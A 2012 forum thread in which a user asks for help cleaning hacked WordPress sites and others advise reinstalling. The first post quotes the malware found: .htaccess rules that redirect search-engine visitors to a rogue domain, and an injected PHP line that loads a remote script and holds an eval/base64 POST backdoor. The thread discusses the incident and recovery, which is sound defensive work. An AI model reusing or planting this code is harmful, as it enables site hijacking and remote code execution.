Forum Home
Press F1
 
Thread ID: 122699 2012-01-08 00:07:00 Hijacked wordpress site Chilling_Silence (9) Press F1
Post ID Timestamp Content User
1252816 2012-01-08 00:07:00 Hi all,

Got a problem with a couple of wordpress sites. For some reason when visiting them via a search engine, we're being redirected to a rogue site.
I've found this in the .htaccess:


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|mail|yan dex|rambler|ya|aport|linkedin|flickr|nigma|liveint ernet|vkontakte|webalta|filesearch|yell|openstat|m etabot|nol9|zoneru|km|gigablast|entireweb|amfibi|d moz|yippy|search|walhello|webcrawler|jayde|findwha t|teoma|euroseek|wisenut|about|thunderstone|ixquic k|terra|lookle|metaeureka|searchspot|slider|topsev en|allthesites|libero|clickey|galaxy|brainysearch| pocketflier|verygoodsearch|bellnet|freenet|firebal l|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar| suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv)\.(.*)


RewriteRule ^(.*)$ byidget.ru [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orang e|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewi n|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomse ek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan |qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|ex press|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gul esider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clus h|ehow|findhow|icq|goo|westaustraliaonline)\.(.*
RewriteRule ^(.*)$ byidget.ru [R=301,L]

</IfModule>


ErrorDocument 400 byidget.ru
ErrorDocument 401 byidget.ru
ErrorDocument 403 byidget.ru
ErrorDocument 404 byidget.ru
ErrorDocument 500 byidget.ru



However for some reason when I still visit the site I'm still being redirected. I've done a bit of a check and I also found this:



cat wordpress/wp-blog-header.php
<?php
// global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "turnitupnow.net($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43), $_POST[$sessdt_p])));exit;} }

/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/


Looks like somethings not quite right (So I commented that first line out), but I'm not entirely sure where else to go. Is it worth going for a reinstallation of wordpress and just pulling the db across?

Any ideas?

Thanks


Chill. 		Chilling_Silence (9)
1252817 2012-01-08 00:30:00 If it was me:

1. A Wordpress install looks like a bowl of spaghetti.
2. The hacker knows it a hell of a lot better than me.

I would nuke it from orbit. 		fred_fish (15241)
1252818 2012-01-08 00:37:00 Yeah was kinda figuring that would be the way to go :-/

Time for a re-install then I s'pose, wish me luck ;) 		Chilling_Silence (9)
1252819 2012-01-08 04:52:00 Is the hijack with wordpress.com or wordpress.org?

LL 		lakewoodlady (103)
1252820 2012-01-08 06:07:00 It's a couple of custom-hosted sites using the opensource wordpress :) Chilling_Silence (9)
1252821 2012-01-08 06:19:00 It's a couple of custom-hosted sites using the opensource wordpress :)

In that case, wordpress probably won't want to know. :( 		lakewoodlady (103)
1252822 2012-01-08 06:22:00 I've seen something similar, and it was very difficult to remove (there is code hidden in various places that will re-infect what you've already cleaned up!!!). If you have a known good backup of both the db and the files, restore, otherwise you will want to reinstall. somebody (208)
1252823 2012-01-09 03:25:00 Turns out its on most of my wordpress sites, on a couple of different hosts, using a variety of themes from different places (Some were standard themes) and some with different (Some with none) plugins.

Gonna be a *long* night methinks :( 		Chilling_Silence (9)
1252824 2012-01-09 07:05:00 Ouch - good luck. somebody (208)
1252825 2012-01-09 08:18:00 OK so yeah long story short there was a shared-hosting user with two sites on it.
I fixed up Site A and got it all back up, nuked wordpress and started over, cleared *all* the .haccess files that user account had access to, changed the ssh / ftp / website / mysql passwords, changed the auth keys / salts, and everything was looking fine. I was going to fix up the second site a short while after.

Took a break for dinner, came back and the .htaccess files where back again. The sites .php files hadn't been infected though thankfully, nor the database. This happened twice, until I cottoned on until what was happening. I removed the site entirely and it's been fine now for 4 hours (Previously it was infected within half an hour of being cleaned.

All this appears to have happened around the 4th, the day after the new Wordpress came out that apparently fixed the vulnerabilities, coz from what I can tell based on the plugins / themes in use across my different Wordpress sites, it wasn't any of them, but Wordpress itself.
Lucky me ... 		Chilling_Silence (9)
1 2 3 4 5 6